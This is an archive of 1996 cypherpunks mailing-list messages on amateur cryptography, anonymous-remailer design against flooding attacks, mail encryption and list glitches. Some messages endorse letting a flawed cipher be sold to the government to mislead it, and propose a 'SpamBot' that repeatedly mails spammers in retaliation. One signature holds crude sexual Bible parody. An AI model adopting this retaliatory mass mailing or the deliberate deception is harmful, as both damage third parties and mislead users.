Message-ID: <9608231522.aa16054@hq.ljl.COM.>
MIME-Version: 1.0
Content-Type: text/plain


Anybody want to give this guy The Business? Earlier attempts didn't seem
to sink in.

-Paul

>Path:
HiWAAY.net!imci2!imci3!newsfeed.internetmci.com!news.mathworks.com!nntp.primenet.com!news.primenet.com!btcarey
>From: btcarey@primenet.com (Brent A. Carey)
>Newsgroups: comp.sys.mac.programmer.help
>Subject: Cryptography Revisited
>Date: 23 Aug 1996 01:15:01 -0700
>Organization: Primenet Services for the Internet
>Lines: 67
>Message-ID: <btcarey-2308960115290001@news.primenet.com>
>X-Posted-By: @198.68.41.180 (btcarey)
>Mime-Version: 1.0
>Content-Type: text/plain; charset=ISO-8859-1
>Content-transfer-encoding: 8bit
>X-Newsreader: Yet Another NewsWatcher 2.2.0
>
>I am posting again to hopefully clear up my last post on this topic.  I
>have received a dozen e-mail replies since I posted less than a day ago. 
>I believe I poorly represented my request earlier.
>
>I am retired professional with several years of training and experience in
>intelligence analysis and cryptanalysis.  The encryption scheme I
>developed was employed for 3 years for passing sensitive data over
>unsecure channels.  Working for the government, the original program was
>written for DOS and enjoyed the benefit of physical security.  That is to
>say, access to the encryption program itself was carefully restricted.
>
>Where I feel I was unclear is on the key to the scheme's security.  Any
>encryption scheme can be cracked provided the cryptanalyst has enough of a
>sample to work with, enough time, and/or enough processing power.  My
>encryption scheme relies on data bursts of time-sensitive packets.  Each
>machine running the program has its own time and packet signature.  The
>unique signatures make it impossible (nothing is impossible) to decrypt a
>complete file without access to both the sender's and receiver's
>signatures.  Even then it would take an enormous amount of processing
>power to crack (more than big business can justify, but not much for major
>governments).  The only way to obtain a computer's signature (which is
>easily changed on a regular basis), is to have physical access to the
>computer's encryption application and support files.
>
>With the help of a more experienced DOS programmer, an application was
>built that provided adequate protection that would increase the time
>required to extract a computer's signature (even if one knew exactly how
>to do it), that it was impractical to attempt.
>
>I am now porting the application to the Mac with the intent to sell it to
>a private contractor that is developing RISC-based computers for
>specialized use in the government.  I have been assured that a PPC native
>application will run on the computers, and was encouraged to develop the
>application.  Mostly what I need to know is how long it would take a
>super-human cracker to obtain a signature and how she would do it.  If I
>can increase the expected time to 96+ hours, I'm in business (I always
>assume half of my best guess - 48 hours is the required specification).
>
>I am developing the code with the help of an excellent Mac programmer. 
>The problem is, that neither of us can crack it at all, although we know
>that is theoretically possible.  He lacks sufficient crypto understanding,
>and I lack sufficient computer knowledge.  Working together we make little
>progress, and truthfully don't have enough time to develop and crack at
>the same time.  I will not be comfortable with the final product until
>someone cracks it and I have a sound understanding of the weaknesses that
>I have not considered.
>
>Finally, MacPGP is a GREAT program.  I didn't mean to belittle any of the
>PGP programs.  PGP carries much more protection than necessary for it's
>intended and practical uses.  Granted, it could use a new interface, but
>it is certainly functional and not lacking in features.  Initially, I
>considered releasing a public version of my application in response to the
>need for a more Mac-like encryption program.  There is no reason for the
>average Mac user to switch from PGP to my program.  It lacks (and will
>always lack) the features of MacPGP, and although it is more secure than
>PGP the user must accept some increased inconvenience to realize the bulk
>of the added security.  For most users, this is adding overkill to
>overkill.
>
>I extend my apologies for posting this huge message off topic, but I felt
>I had grossly misrepresented my request.  I feared the influx of e-mail
>tomorrow morning if I didn't clarify.  I appreciate all those that
>extended advice.  I will follow up on much of it, and I thank those who
>replied.
>
>
>Brent A. Carey

--
Paul Robichaux       LJL Enterprises, Inc.
paul@ljl.com         Be a cryptography user. Ask me how.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Sat, 24 Aug 1996 09:21:42 +0800
To: cypherpunks@toad.com
Subject: Re: The Future Of Cyber Terrorism
In-Reply-To: <199608231811.SAA21789@pipe3.t2.usa.pipeline.com>
Message-ID: <Pine.GUL.3.95.960823154531.4729I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 23 Aug 1996, John Young wrote:

> http://www.acsp.uic.edu/OICJ/CONFS/terror02.htm 
>  
> This quackery-puffery is truely hilarious. 

Comes with the territory (excuse me, as they say, *CyberTerritory*).

> Worth reading for brave attempt to distinguish between
> our-adorable-intelligent-children qua hackers and terrifying
> next-door-neighbors so differently-abled-from-us cyber-terrorists. 

Speak for yourself :-)

> Unsubtly shaded white, off-white, black and blacknet movie-plotting. 

IOW, perfect for cypherpunks. :-)

> Thus Sprachen Zarathrustran Klaus: Commerce in
> ignorant-inner-fear-panderings regulation time.

I was *almost* willing to give them the benefit of the doubt until I saw the
PO box and this:

  "Now is the time to take action. Unfortunately, due to this open nature of
  this document, specific counter-CyberTerrorism measures cannot be
  discussed. Those discussions must be reserved for secured facilities."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Bruce M." <bkmarsh@feist.com>
Date: Sat, 24 Aug 1996 08:05:50 +0800
To: cypherpunks@toad.com
Subject: Intel to rule the basic crypto engine market?
Message-ID: <Pine.BSI.3.91.960823160256.19295A-100000@wichita.fn.net>
MIME-Version: 1.0
Content-Type: text/plain



InfoWorld, August 19, 1996, p1
By Luc Hatlestad & Tom Quinlan

------------------------------

    Looking to bring a standard infrastructure to hardware- and 
software-based encryption offerings, Intel Corp. has started developing a 
Common Data Security Architecture (CDSA) designed to integrate security 
software, operating systems, and third party applications.

[...]
------------------------------

http://www.infoworld.com/cgi-bin/displayArchives.pl?960816.encryption.htm
   

                       ________________________________
                      [ Bruce M. - Feist Systems, Inc. ]
                       ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
     "Official estimates show that more than 120 countries have or are 
      developing [information warfare] capabilities." -GAO/AIMD-96-84
                         So, what is your excuse now?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 24 Aug 1996 04:18:04 +0800
To: cypherpunks@toad.com
Subject: BOD_ies
Message-ID: <199608231647.QAA17381@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-23-96. FiTi: "The race is on for global groups to develop 
   'electronic purses' using smart cards." 
 
      "We are moving into the electronic age where money will 
      just be information about the wealth you have," says 
      Visa. Some companies believe that parts of the body, 
      rather than paper or coins, can be used to establish the 
      amount of money somebody has available to spend. 
 
   WaPo: "Group Plans Challenge To Net Address Monopoly." 
 
      The end may be at hand for the virtual monopoly that 
      Network Solutions holds over the registration of 
      Internet addresses. The Internet Assigned Numbers 
      Authority, the Internet Society and IETF will organize 
      a competition for the right to operate new registries. 
      The group's aim is to create alternatives to the 
      established categories of Internet addresses. 
 
   NYP: "Flaw Said to Be Found in Microsoft's Browser." 
    
      Markoff's report on the Princeton group's discovery. 
 
   ----- 
 
   http://jya.com/bodies.txt  (17 kb for 3) 
 
   BOD_ies 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 24 Aug 1996 08:03:40 +0800
To: talon57@well.com
Subject: Re: Re:phoneco vs X-phone
Message-ID: <01I8MFWC2BFK9JDD4G@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	Don't forget opportunity costs. With the money it spent to put in
the fiber optics, the phone company could have made some loans and gotten
interest back.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Sat, 24 Aug 1996 08:00:41 +0800
To: sopwith@redhat.com (Elliot Lee)
Subject: Re: Securing Internet mail at the MTA level
In-Reply-To: <Pine.LNX.3.95.960820170631.8463B-100000@dilbert.redhat.com>
Message-ID: <199608232230.RAA12411@homeport.org>
MIME-Version: 1.0
Content-Type: text


Elliot Lee wrote:
| On Tue, 20 Aug 1996, C Matthew Curtin wrote:

| > Two types of approaches are possible:
| >     1. Adding to the SMTP protocol itself, allowing for MTAs to
| >        identify crypto-capable peers, and then performing
| >        authentication and session encryption where possible.

like pgpsendmail?

| >     2. Waiting for a cryptographic transport layer network protocol
| >        (such as what is being proposed in draft-ietf-tls-ssh-00),
| >        allowing SMTP to remain untouched, and only requiring MTAs to
| >        add support for the new network protocol.

| >     2. Is there another approach that could work better?
| >     3. Is there interest in adding SSH functionality to sendmail in
| >        the near future (either by the draft spec, or once the RFC has
| >        been published)?
| 
| Have you looked at SSL? It allows different algorithms to be used, etc.
| etc. (although the certificate & key distribution method uses x509, which
| may be a pain...?). The SSLeay library is a freely available
| implementation of SSLv2.

	The big problem with adding SSL or ssh to mail transport is
that both assume that mail goes from host A to host B, with none in
between.  This is useful, but its more useful (IMHO) to integrate something
that doesn't use online key exchange to ensure end to end security.

	Take for example, Alice sends mail to Dave via Brian and
Charlie.  A point to point protocol, while useful against Eve and
Mallet, doesn't address the fact that Brian works for the NSA.  While
if Alice's sendmail encrypts the message to Dave, then Brian and
Charlie are reduced to traffic analysis instead of reading the mail.

	The case of mail being carried by an intermediary is still
pretty large.

	In any event, I don't see an advantage other than buzzwords to
using SSL/SSH over PGP, while I do see advantages to pgp.

Adam



-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 24 Aug 1996 05:18:01 +0800
To: cypherpunks@toad.com
Subject: Re: The Future Of Cyber Terrorism
Message-ID: <199608231811.SAA21789@pipe3.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


http://www.acsp.uic.edu/OICJ/CONFS/terror02.htm 
 
 
This quackery-puffery is truely hilarious. 
 
 
Worth reading for brave attempt to distinguish between
our-adorable-intelligent-children qua hackers and terrifying
next-door-neighbors so differently-abled-from-us cyber-terrorists. 
 
 
Unsubtly shaded white, off-white, black and blacknet movie-plotting. 
 
 
Thus Sprachen Zarathrustran Klaus: Commerce in
ignorant-inner-fear-panderings regulation time.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Aug 1996 11:59:43 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Remailers
Message-ID: <ae43a86a01021004d0a8@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:52 PM 8/23/96, Chris J Samuelson wrote:
>When you mail an item through more than one anonymous remailer, how does
>that make it anymore anonymous, or doesn't it?

When only a single remailer is used, the remailer can see the mapping
between the sender and the receiver.

When two remailers are used, the first remailer can see the sender, but not
the final recipient. The second remailer can see the final recipient, but
not the original sender. Of course, the two remailers can get together and
"collude," thus deducing the mapping between sender and recipient.

With N remailers, the likelihood of collusion amongst the N remailers is
less likely, possibly extremely unlikely. This is the core theory of mixes,
or remailers.

(And of course one can include one's self as a remailer, to further
increase one's confidence that collusion has not occurred.)

--Tim May


We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Aug 1996 11:52:41 +0800
To: cypherpunks@toad.com
Subject: "----- Message body suppressed -----"
Message-ID: <ae43a99302021004167e@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 1:10 AM 8/21/96, Skip wrote:
>   ----- Message body suppressed -----
>


Sounds good to me. Keep it up.


--Tim May


--
[This Bible excerpt awaiting review under the U.S. Communications Decency
Act of 1996]
And then Lot said, "I have some mighty fine young virgin daughters. Why
don't you boys just come on in and fuck them right here in my house - I'll
just watch!"....Later, up in the mountains, the younger daughter said:
"Dad's getting old. I say we should fuck him before he's too old to fuck."
So the two daughters got him drunk and screwed him all that night. Sure
enough, Dad got them pregnant, and had an incestuous bastard son....Onan
really hated the idea of doing his brother's wife and getting her pregnant
while his brother got all the credit, so he pulled out before he
came....Remember, it's not a good idea to have sex with your sister, your
brother, your parents, your pet dog, or the farm animals, unless of course
God tells you to. [excerpts from the Old Testament, Modern Vernacular
Translation, TCM, 1996]






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 24 Aug 1996 12:04:03 +0800
To: cypherpunks@toad.com
Subject: Re: FW: Cryptography Revisited
Message-ID: <ae43aad50302100461fd@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 8:21 PM 8/23/96, Paul Robichaux wrote:
>Anybody want to give this guy The Business? Earlier attempts didn't seem
>to sink in.

>>From: btcarey@primenet.com (Brent A. Carey)
>>Newsgroups: comp.sys.mac.programmer.help
>>Subject: Cryptography Revisited
>>Date: 23 Aug 1996 01:15:01 -0700
....
>>I am now porting the application to the Mac with the intent to sell it to
>>a private contractor that is developing RISC-based computers for
>>specialized use in the government.  I have been assured that a PPC native

I think it better that we not discourage him. If he can sell his "Snake Oil
Cypher System" to the government, this will be a Good Thing. It will slow
them down, lull them into false security, and distract them as they are
cleaning up the mess.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sat, 24 Aug 1996 12:37:30 +0800
To: "Dr.Dimitri Vulis KOTM" <dlv@bwalk.dm.com>
Subject: Re: Any CPs in D.C.?
In-Reply-To: <s792sD80w165w@bwalk.dm.com>
Message-ID: <Pine.SUN.3.91.960823184142.7589A-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


Some of us DC-area cypherpunks are planning to get together with Lucky
this Saturday afternoon. Interested? Send me mail... 

-Declan



> Black Unicorn <unicorn@schloss.li> writes:
> > Are you in D.C. now?
> >
> > Perhaps a drink would be in order?




// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Sat, 24 Aug 1996 05:11:12 +0800
To: cypherpunks@toad.com
Subject: strengthening remailer protocols
Message-ID: <9608231805.AA01523@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




This is long enough.  I've been brutal and cut sections less
likely to promote discussion.

(I've also contacted OUP about Ganley's book, and may 
 buy it if I can kid myself I don't need the money.)


============================================================
August 1996
Peter M Allan
peter.allan@aeat.co.uk


                   Strengthening Remailer Protocols

STATUS OF THIS MEMO

This memo proposes improvements for the Mixmaster protocol and
requests discussion and further suggestions.
Distribution of this memo is unlimited.

INTRODUCTION

Lance Cottrell's documents [1] and [2] describe the current Mixmaster
protocol and attacks against it.  This memo began as a response to
those thoughts, but has developed in discussion with Cottrell.


SPAMMING ATTACK

[2] describes an active attack where many messages are sent to an
honest remailer to separate a message of interest from other
traffic.  The aim is to clear other messages out of the message pool,
wait for the target and finally eject that from the pool.  The target
message is identified because the attacker can recognise  his own
messages.

Attempts to defeat this attack could well be based on preventing the
attacker from recognising his own messages.  That is the approach
taken here.

     RE-ENCRYPTION AS A SPAM DEFENCE
     
     In this diagram remailer 'A' has received a message addressed to
     himself.  Inside that is one to 'B' - unreadable to A.  Further
     layers are hidden of course.

                AB?????  decrypts to B?????

     This means that our remailer can only disguise the message by
     re-encrypting it on the outside.  But the message has got to
     make some net progress toward delivery.  The trick is that a
     remailer can find the outer two headers addressed to him and
     process both of them.  Two headers processed and one rewound is net
     progress.  When the header rewound is addressed to the same
     recipient as was next on the list anyway the diagram looks like
     this.

     Actions at 'A':            AB????? decrypts to  B?????
                                 B????? encrypts to BB?????

     Actions at 'B':            BB?????  decrypts to B?????
                                         decrypts to  C????
                                         encrypts to CC????

     The beauty of this is that it is compatible with the existing
     protocol.  If a remailer only knows about removing layers of
     encryption it still fits into a network where some can do both
     actions.  Whether it sends or receives the message it still
     works.


     RE-ENCRYPTION IN THE MIXMASTER ROTATING QUEUE MODEL
     
     Instead of layers like an onion, Mixmaster has a queue of
     headers that get rotated.  A used header goes to the back of the
     queue where it can never again be read.  At some point the
     header at the front of the queue is found to be the last one,
     and the message is sent on its final hop.

     For a header queue the above actions look like this:

     Actions at 'A':        AAAB???  -> AAB???a
                                     -> AB???aa
                                     -> BB???aa

     In general when the first H headers are addressed to the
     remailer reading them, (H-1) rotations will be performed, and
     the top header will be overwritten with another one with a
     random key and IV to encrypt the rest of the message.  The
     number of headers present remains 20, however many or few of
     these are still to be read.  No valid header block is ever
     overwritten, only used header blocks that are good for nothing.
     This is always possible because after a remailer receives a
     message at least the one header it has just read must be of no
     further use.

     This will hide the message content from eavesdroppers, but not
     from the next remailer in line - 'B'.  Assume that remailer B
     is operated by an attacker, and that he directs spam messages
     there after host A (which is holding your message in the pool at
     the time of the attack).  B can read all messages sent by the
     attacker (who knows B's private key).  This is also why I think
     link encryption offers incomplete protection.

     RE-ENCRYPTION WITH CHEATERS

     Mixmaster assumes that no particular remailer in the network can
     be trusted and that the user does not know which remailers
     cheat.  The message passes through a chain of remailers, who aim
     to hide information from each other so that the compromise of
     some of them will not disclose the original sender and final
     destination.

     Central to the spamming attack is the idea that the attacker can
     recognise the messages he is trying to trace.  This is done by
     eliminating  his own messages.   The whole set - not just
     some of them.  It can be arranged that the attacker does not
     obtain the whole set until it is too late to trace the target
     message (i.e. after a few hops, when it is likely to have met other
     legitimate traffic).  The partial information the attacker obtains
     before all the spams are identified will be of some use, but
     following each of several leads with a new spam attack is unappealing
     as the number of suspect messages will just grow.

     The remailer needs the freedom to divert packets to another
     remailer.  This is shown below; where remailer C was chosen at
     random.

     Actions at 'A':        AAAB???  -> AAB???a
                                     -> AB???aa
                                     -> CB???aa

     Each remailer could have three options when sending a packet to
     its next host.

        1) rotate all possible headers, and send the result  (current protocol)
        2) re-encrypt message with new 3DES key and IV.  Do not divert.
        3) re-encrypt message with new 3DES key and IV.  Divert at random.
     
     Good probabilities for these options might be:

        1) 20%   P(1) = P(3)  The number of headers the next host can read
                 should not reveal whether a diversion has just been made.
                 (We care about this because it discourages cheaters
                  deliberately refusing to pass on your mail.)
        2) 60%   Other outgoing packets are not distinguishable from spams.
        3) 20%   Should not approach 100%.
                 (To arrive is better than to travel in hope.)
     
     A spam attack as described in [2] would use many more packets
     than those in the message pool (N) on the host under attack.  The
     number of spam packets diverted to honest remailers (a
     proportion R of the whole) would be about

		 MANY  . N  . P(3) . R

     and those diverted twice in succession to honest remailers would
     be about

		 MANY  . N  . P(3) . P(3) . R . R

     and I'd expect a figure above 5 here to thwart the spammer, because
     of the time taken to collect the 5 spams.

     This diversion (adding steps to the middle of a chain) seems different
     from a Middleman scheme [3] where extra hops are added at the end.

     This scheme does NOT allow a remailer to choose the rest of the
     chain to be followed.  A dishonest remailer cannot bypass any
     remailer chosen by the original sender (in the hope of following
     the message to its destination) using only cooperating dishonest
     remailers) because the message has been encrypted in the public
     key of each remailer the sender chose before it entered the
     network.



REFERENCES

1      Frequently Asked Questions about Mixmaster Remailers
       FAQ Version 1.8 July 4 1996
       by Lance Cottrell <loki@obscura.com.>


2      http://www.obscura.com/~loki/remailer/remailer-essay.html
       by Lance Cottrell <loki@obscura.com.>

3      email  "Re: middleman - what is it ?"
       "John A. Perry" <perry@alpha.jpunix.com>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 24 Aug 1996 18:52:47 +0800
To: Rich Graves <cypherpunks@toad.com
Subject: Weird "Suppression" messages
Message-ID: <3.0b11.32.19960823190618.00ba29dc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:54 PM 8/20/96 -0700, Rich Graves wrote:
>   ----- Message body suppressed -----
>
>--SAA08114.840765294/tera.mcom.com--

This is bizzare.  I have gotten three messages with this message.

Is someone at Netscape canceling messages?  (mcom.com is the old domain name
of Netscape.)

Anyone have any ideas on this?
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sat, 24 Aug 1996 13:05:40 +0800
To: cypherpunks@toad.com
Subject: Re: "----- Message body suppressed -----"
Message-ID: <3.0b11.32.19960823191752.00bae67c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 06:25 PM 8/23/96 -0700, Timothy C. May wrote:
>At 1:10 AM 8/21/96, Skip wrote:
>>   ----- Message body suppressed -----
>>
>
>
>Sounds good to me. Keep it up.

It looks like an internal mailing list version of Cypherpunks at Netscape is
feeding back into the regular list with weird results.

---
|  "Remember: You can't have BSDM without BSD. - alan@ctrl-alt-del.com  "|
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Sun, 25 Aug 1996 02:40:08 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Weird "Suppression" messages
In-Reply-To: <3.0b11.32.19960823190618.00ba29dc@mail.teleport.com>
Message-ID: <Pine.GUL.3.95.960823193109.7805A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


After Klemensrud settled the Scientology suit, they were emboldened to show
the flag at Netscape.

It is no coincidence that Tom Cruise used Netscape in Mission: Impossible.

Be afraid. Be very afraid.

(It's also possible that there's a mail routing flap at Netscape, but I
would not discount the Scientology angle. Every conspiracy theory contains
a grain of truth, after all.)

-rich

On Fri, 23 Aug 1996, Alan Olsen wrote:

> At 10:54 PM 8/20/96 -0700, Rich Graves wrote:
> >   ----- Message body suppressed -----
> >
> >--SAA08114.840765294/tera.mcom.com--
> 
> This is bizzare.  I have gotten three messages with this message.
> 
> Is someone at Netscape canceling messages?  (mcom.com is the old domain name
> of Netscape.)
> 
> Anyone have any ideas on this?
> ---
> Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
>         `finger -l alano@teleport.com` for PGP 2.6.2 key 
>                 http://www.teleport.com/~alano/ 
>   "We had to destroy the Internet in order to save it." - Sen. Exon
>                 "Microsoft -- Nothing but NT promises."





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: qut@netcom.com (Skipp OBC)
Date: Sun, 25 Aug 1996 03:54:05 +0800
To: postmaster@stanford.edu
Subject: Abuse by llurch of ISP
Message-ID: <199608240240.TAA13822@netcom16.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>From qut Fri Aug 23 19:21:25 1996
Subject: Re: Abusive mail from qut@netcom.com refused
To: abuse@netcom.com, rcgraves@ix.netcom.com, llurch@stanford.edu
Date: Fri, 23 Aug 1996 19:21:25 -0700 (PDT)
In-Reply-To: <199608240106.SAA07144@Networking.Stanford.EDU> from "Rich Graves" at Aug 23, 96 06:06:04 pm
X-Mailer: ELM [version 2.4 PL23]
MIME-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Length: 1564      

! Dear Netcom:
! 
! You suspended the account of this cross between Boursy and Dan Gannon (but

Absurd!  Boursy is non-political and objectively a true net abuser.  
So is Gannon who spammed thousands of newsgroups with identical political 
posts, such groups as sci.physics and sci.math .

! not as sincere) for two weeks in March for net abuse including mailbombing
! and forging cancels. Please restore what little faith I once had in Netcom
! by considering doing so again. 

Netcom has considerably higher standards than Stanford, an account there 
is apparantly considered an actual right rather than a service.
llurch@stanford.edu is his address he abuses the net from, you won't find 
his abuses from rcgraves@ix.netcom.com which he very rarely uses, this 
e-mail, for example, was forged from networking.stanford.edu .

! All mail from qut@netcom.com to any of my email addresses is now being
! bounced to you as well as to him. Until he stops, you will usually receive
! multiple copies, because he usually sends multiple copies. 

This is absurd, we both subscribe to the same mailing list, cypherpunks, 
thereby anything I post to the list will be abusively e-mailed to 
abuse@netcom.com .  Also, It is inherent that posting to usenet invites 
e-mailed responses, which would make what he is doing even more abusive.

Rich Graves is a prominant net abuser, false complaints are part of his 
repertoire.  He has never before complained about recieving courtesy 
copies of responses to his posts, this is the first I've heard of it.


--
qut@netcom.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.net>
Date: Sun, 25 Aug 1996 06:31:51 +0800
To: alano@teleport.com
Subject: Re: "----- Message body suppressed -----"
Message-ID: <199608240242.TAA29010@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: alano@teleport.com, cypherpunks@toad.com
Date: Fri Aug 23 22:43:00 1996
I just got 17 more in the last 30 minutes.  They appear to match messages 
delivered already as per sender, subject and time.  The only common issue I 
see it toad.  I have copied a set below.

- ------------ FULL Message

Return-Path: cypherpunks-errors@toad.com
Received: from toad.com (toad.com [140.174.2.1]) by infinity.c2.org 
(8.7.4/8.6.9) with ESMTP
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id GAA15937 
for cypherpunks-outgoing; Thu, 22 Aug 1996 06:57:25 -0700 (PDT)
Received: from big.aa.net (root@big.aa.net [204.157.220.2]) by toad.com 
(8.7.5/8.7.3) with ESMTP id GAA15932 for <cypherpunks@toad.com>; Thu, 22 
Aug 1996 06:57:18 -0700 (PDT)
Received: from fozzy.aa.net (moon-c24.aa.net [204.157.220.124]) by 
big.aa.net (8.7/8.7.5) with SMTP id GAA06741 for <cypherpunks@toad.com>; 
Thu, 22 Aug 1996 06:57:16 -0700
X-UIDL: 840751255.041
X-Intended-For: <cypherpunks@toad.com>
 From: blane@aa.net (Brian C. Lane)
To: cypherpunks@toad.com
Subject: SpamBot
Date: Thu, 22 Aug 1996 13:56:22 GMT
Organization: Nexus Computing
Reply-To: blane@aa.net
Message-ID: <321c65db.721494@mail.aa.net>
X-Mailer: Forte Agent .99e/16.227
Sender: owner-cypherpunks@toad.com
Precedence: bulk


  Well, with all the other noise in the list lately, I'll add a little of
my own. I woke up today to find my mailbox filled with 20 messages from a
'careernetonline.com' offering to spread my resume across the net for $60.

  It was one of those terrorist spams where they apologize for wasting your
time and tell you that you can stop getting spammed by replying to the
message. Well, I really hate giving in to terrorists, no matter what form
they take. And I'm sick and tired of spam.

  So, I'm starting a project called SpamBot. You feed it a message and a
list of addresses and the bot send the message to those addresses until
they reply with an appropriate message indicating that they are at least
looking into the problem.

  Some people may say that this is sinking to their level. So it is, but I
think its time that system administrators realized that there are people
who don't appreciate being the target for shotgun marketing schemes (none
of which have been of any use to me).

  Watch my webpage for more info on this helpful little bot.

    Brian

- ------- <blane@aa.net> -------------------- <http://www.aa.net/~blane> 
- -------
       "Extremism in the defense of Liberty is no vice" - B. Goldwater
==============  11 99 3D DB 63 4D 0B 22  15 DC 5A 12 71 DE EE 36  
============

- --------- SUPPRESED Message

Return-Path: cypherpunks-errors@toad.com
Received: from toad.com (toad.com [140.174.2.1]) by infinity.c2.org 
(8.7.4/8.6.9) with ESMTP
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id TAA20706 
for cypherpunks-outgoing; Fri, 23 Aug 1996 19:20:59 -0700 (PDT)
Received: from littlewing.mcom.com (h-205-217-255-33.netscape.com 
[205.217.255.33]) by toad.com (8.7.5/8.7.3) with ESMTP id TAA20700 for 
<cypherpunks@toad.com>; Fri, 23 Aug 1996 19:20:55 -0700 (PDT)
Received: (from root@localhost) by littlewing.mcom.com (8.7.3/8.7.3) id 
TAA08776; Fri, 23 Aug 1996 19:23:25 -0700 (PDT)
Received: from maleman.mcom.com (maleman.mcom.com [198.93.92.3]) by 
tera.mcom.com (8.6.12/8.6.9) with ESMTP id GAA13912 for 
<mcom.list.cypherpunks@tera.mcom.com>; Fri, 23 Aug 1996 06:51:48 -0700
Received: from ns.netscape.com (ns.netscape.com.mcom.com [198.95.251.10]) 
by maleman.mcom.com (8.6.9/8.6.9) with ESMTP id HAA11324; Thu, 22 Aug 1996 
07:24:22 -0700
Received: from toad.com (toad.com [140.174.2.1]) by ns.netscape.com 
(8.7.3/8.7.3) with ESMTP id HAA08688; Thu, 22 Aug 1996 07:23:23 -0700 (PDT)
Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id GAA15937 
for cypherpunks-outgoing; Thu, 22 Aug 1996 06:57:25 -0700 (PDT)
Received: from big.aa.net (root@big.aa.net [204.157.220.2]) by toad.com 
(8.7.5/8.7.3) with ESMTP id GAA15932 for <cypherpunks@toad.com>; Thu, 22 
Aug 1996 06:57:18 -0700 (PDT)
Received: from fozzy.aa.net (moon-c24.aa.net [204.157.220.124]) by 
big.aa.net (8.7/8.7.5) with SMTP id GAA06741 for <cypherpunks@toad.com>; 
Thu, 22 Aug 1996 06:57:16 -0700
X-UIDL: 840854011.002
X-Intended-For: <cypherpunks@toad.com>
 From: blane@aa.net (Brian C. Lane)
To: cypherpunks@toad.com
Subject: SpamBot
Date: Thu, 22 Aug 1996 13:56:22 GMT
Organization: Nexus Computing
Reply-To: blane@aa.net
